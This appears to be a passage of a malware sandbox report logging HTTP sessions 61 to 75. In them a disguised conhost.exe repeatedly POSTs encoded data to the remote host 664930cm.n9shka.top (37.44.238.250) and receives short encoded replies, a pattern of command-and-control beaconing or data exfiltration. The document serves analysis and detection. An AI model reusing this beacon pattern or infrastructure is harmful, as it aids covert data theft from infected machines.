61 | 192.168.2.6 | 49773 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:24.967103958 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Oct 1, 2024 05:58:25.324632883 CEST | 1120 | OUT | Data Raw: 58 55 5f 5f 5c 44 51 51 5c 58 57 5a 54 52 55 50 59 5b 59 5f 50 59 56 45 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XU__\DQQ\XWZTRUPY[Y_PYVE[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":U/W5+4]*2)Z$.[18'- +U'=8W11"U&B9?";(9!F/'P,
Oct 1, 2024 05:58:25.582802057 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:25.719170094 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.6 | 49774 | 37.44.238.250 | 80 | 1924 | C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:25.851136923 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 664930cm.n9shka.top
Content-Length: 1120
Expect: 100-continue
Connection: Keep-Alive
Oct 1, 2024 05:58:26.200103045 CEST | 1120 | OUT | Data Raw: 58 51 5a 5c 59 44 54 51 5c 58 57 5a 54 5a 55 5b 59 51 59 5f 50 50 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
Data Ascii: XQZ\YDTQ\XWZTZU[YQY_PPVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y97U"?>23=)$(78 <0>8V1!!$$)?!<?!F/'P,-
Oct 1, 2024 05:58:26.467844963 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:26.599069118 CEST | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Oct 2024 03:58:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3c 55 5c 50
Data Ascii: <U\P


Session ID: 63
Source IP: 192.168.2.6
Source Port: 49775
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:26.741493940 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:27.090369940 CEST | 1120 | OUT | Data Raw: 58 50 5a 5b 59 48 54 53 5c 58 57 5a 54 58 55 5e 59 51 59 5b 50 5f 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XPZ[YHTS\XWZTXU^YQY[P_VD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\.3U5(+="%]$=%^#^-0?R0.41"12(+*9!F/'P,%
Oct 1, 2024 05:58:27.385956049 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:27.518934011 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:27 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 64
Source IP: 192.168.2.6
Source Port: 49776
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:27.644674063 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:28.013705969 CEST | 1120 | OUT | Data Raw: 58 50 5a 58 59 49 54 54 5c 58 57 5a 54 52 55 5a 59 56 59 58 50 50 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XPZXYITT\XWZTRUZYVYXPPVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"- "<]>%_0>18X-3 3= Q1!P%4"(#?)!F/'P,
Oct 1, 2024 05:58:28.307374001 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:28.476569891 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:28 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 65
Source IP: 192.168.2.6
Source Port: 49777
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:28.608047962 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:28.994798899 CEST | 1120 | OUT | Data Raw: 58 51 5f 54 5c 44 51 53 5c 58 57 5a 54 5c 55 5a 59 50 59 5b 50 58 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XQ_T\DQS\XWZT\UZYPY[PXVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_- 8'=%\0X*2^?];80.$P%%2:\</<9!F/'P,
Oct 1, 2024 05:58:29.283915997 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:29.453268051 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:29 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 66
Source IP: 192.168.2.6
Source Port: 49778
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:29.578380108 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1112
  Expect: 100-continue
  Connection: Keep-Alive


Session ID: 67
Source IP: 192.168.2.6
Source Port: 49779
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:29.659058094 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1820
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:30.012703896 CEST | 1820 | OUT | Data Raw: 5d 55 5a 5b 5c 41 54 56 5c 58 57 5a 54 53 55 5b 59 56 59 57 50 51 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: ]UZ[\ATV\XWZTSU[YVYWPQVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-!'=1:3.[%<,/%> %2V&>[< W+!F/'P,
Oct 1, 2024 05:58:30.271312952 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:30.466042995 CEST | 308 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:30 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 152
  Connection: keep-alive
  Data Raw: 0e 1d 26 06 25 34 22 1f 36 12 35 59 2a 01 33 10 25 27 27 5b 2e 13 3f 1d 25 2c 38 03 39 0c 21 03 3f 29 03 03 25 2e 33 5c 31 0c 29 0f 33 36 20 5f 0d 10 22 13 21 5e 36 1f 38 07 30 07 3d 32 3c 09 32 23 2f 10 27 23 2a 1b 3f 07 38 11 33 2f 3e 0a 33 02 04 57 2f 25 37 01 2a 19 0e 1f 20 01 2d 56 02 1e 22 14 32 3b 39 51 37 06 36 00 24 16 24 5d 36 01 3e 08 3f 2d 3f 02 24 27 31 02 29 3e 27 1e 2b 2c 24 01 23 2a 3e 06 37 1f 0f 14 24 33 27 5c 20 0d 2d 51 05 34 5a 50
  Data Ascii: &%4"65Y*3%''[.?%,89!?)%.3\1)36 _"!^680=2<2#/'#*?83/>3W/%7* -V"2;9Q76$$]6>?-?$'1)>'+,$#*>7$3'\ -Q4ZP


Session ID: 68
Source IP: 192.168.2.6
Source Port: 49780
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:29.780047894 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1112
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:30.137315035 CEST | 1112 | OUT | Data Raw: 58 53 5f 55 59 49 51 56 5c 58 57 5a 54 5b 55 5f 59 55 59 5e 50 58 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XS_UYIQV\XWZT[U_YUY^PXVC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-# 60^>T*3>6X&(_/#$%>#$"92-(2#+!F/'P,1
Oct 1, 2024 05:58:30.392115116 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:30.521591902 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:30 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 69
Source IP: 192.168.2.6
Source Port: 49781
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:30.658114910 CEST | 347 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
Oct 1, 2024 05:58:31.012473106 CEST | 1120 | OUT | Data Raw: 58 57 5f 5d 5c 46 51 55 5c 58 57 5a 54 5d 55 5b 59 52 59 5c 50 5a 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XW_]\FQU\XWZT]U[YRY\PZVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".7!8(^)Z'&&,#(0.<S%=&$*+2<V?!F/'P,1
Oct 1, 2024 05:58:31.327713013 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:31.461033106 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:31 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 70
Source IP: 192.168.2.6
Source Port: 49782
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:31.776818037 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:32.121800900 CEST | 1120 | OUT | Data Raw: 5d 57 5f 5a 59 42 51 56 5c 58 57 5a 54 5a 55 5f 59 5a 59 5d 50 5b 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: ]W_ZYBQV\XWZTZU_YZY]P[VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!9 0"(<\=-Z'X-2$,38'R12:P$$+"(9!F/'P,-
Oct 1, 2024 05:58:32.319478035 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:32.492397070 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:32 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 71
Source IP: 192.168.2.6
Source Port: 49783
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:32.624578953 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:32.980937004 CEST | 1120 | OUT | Data Raw: 5d 51 5f 54 59 49 54 52 5c 58 57 5a 54 59 55 51 59 5b 59 5c 50 50 56 48 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: ]Q_TYITR\XWZTYUQY[Y\PPVH[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!\-(5;[)5^$.%&+7X,3>$!P2-(U<9!F/'P,!
Oct 1, 2024 05:58:33.259522915 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:33.395345926 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:33 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 72
Source IP: 192.168.2.6
Source Port: 49784
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:33.513641119 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1112
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:33.871493101 CEST | 1112 | OUT | Data Raw: 58 56 5a 58 59 41 51 54 5c 58 57 5a 54 5b 55 5c 59 54 59 5a 50 51 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XVZXYAQT\XWZT[U\YTYZPQVB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_9#"$_)6'%+?;0?W$=$%1>W&B=?<!F/'P,=
Oct 1, 2024 05:58:34.148068905 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:34.283062935 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:33 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 73
Source IP: 192.168.2.6
Source Port: 49785
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:34.421612978 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1120
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:34.777877092 CEST | 1120 | OUT | Data Raw: 58 55 5a 59 5c 46 54 52 5c 58 57 5a 54 5a 55 59 59 5a 59 5d 50 5a 56 44 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: XUZY\FTR\XWZTZUYYZY]PZVD[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!-3!?*5^3.!1+#,#$$;11V17!<4R?!F/'P,-
Oct 1, 2024 05:58:35.026133060 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:35.153289080 CEST | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:34 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3c 55 5c 50
  Data Ascii: <U\P


Session ID: 74
Source IP: 192.168.2.6
Source Port: 49786
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:35.278979063 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1112
  Expect: 100-continue
  Connection: Keep-Alive


Session ID: 75
Source IP: 192.168.2.6
Source Port: 49787
Destination IP: 37.44.238.250
Destination Port: 80
PID: 1924
Process: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 1, 2024 05:58:35.508404016 CEST | 371 | OUT | POST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
  Host: 664930cm.n9shka.top
  Content-Length: 1820
  Expect: 100-continue
  Connection: Keep-Alive
Oct 1, 2024 05:58:35.857446909 CEST | 1820 | OUT | Data Raw: 5d 57 5a 5c 59 48 54 51 5c 58 57 5a 54 5c 55 5b 59 54 59 58 50 59 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
  Data Ascii: ]WZ\YHTQ\XWZT\U[YTYXPYVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.U!+8_>%['=-$(,;$.(V&.&B1<U?9!F/'P,
Oct 1, 2024 05:58:36.119774103 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 1, 2024 05:58:36.253523111 CEST | 308 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Tue, 01 Oct 2024 03:58:35 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 152
  Connection: keep-alive
